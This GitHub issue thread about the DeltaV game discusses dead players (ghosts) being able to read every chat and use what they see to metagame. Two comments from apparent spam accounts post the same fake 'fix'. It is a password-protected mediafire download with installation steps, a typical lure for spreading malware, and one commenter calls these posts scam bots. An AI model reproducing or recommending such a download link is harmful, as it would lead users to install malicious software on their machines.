### ISSUE TITLE
Dead players (ghosts) are able to read all chat

### ISSUE THREAD

**Issue by dekigangsta** [DeltaV-Station/Delta-v#1692]
## Description
When you die in-game and are fully killed, youre able to see every single chat from every character and every role. The problem with this is if youre playing, lets say, a security personnel - and see someone writing in Syndicate chat, there have been instances of seccies using this information to metagame and arrest/attack syndies (i cant give any examples as of now but i remember few instances of this happening months before)

This has also occurred to me some times and during those matches i have lost will of continuing the round because it felt unfair knowing person A, B, C, and D are syndicates. The best part of playing security is gathering evidence and trying to arrest syndies, but dying due to some stupid thing and suddenly knowing information you really shouldnt be able to know takes away all the fun.

A fair fix to this would be to make ghosts “hear”/be able to read text as if you were alive

**Reproduction**

Play, die, read all open chat

**Comment by deltanedas** [comment]
1. this is not a deltav specific issue lol
2. if you see this ahelp it
3. if you see a syndie while you are a ghost shrimply dont behave any differently its that easy
4. even if you could only see local chat and no radio, you can still see through walls and use ghost warp menu etc, someone malicious can still metagame with a little effort

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dekigangsta** [comment]
> 1. this is not a deltav specific issue lol
> 2. if you see this ahelp it
> 3. if you see a syndie while you are a ghost shrimply dont behave any differently its that easy
> 4. even if you could only see local chat and no radio, you can still see through walls and use ghost warp menu etc, someone malicious can still metagame with a little effort

I mean.. if i ahelp what do i say, “i saw a syndie as s ghost”? And what will you guys do..?

as i said it just sucks losing that huge portion of fun cuz i can “cheat” because game allows me to

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by therealDLondon** [comment]
Killing scam bots faster than I kill game server raiders at this point

**Comment by deltanedas** [comment]
ahelp it as in ahelp the seccies that use information as ghost
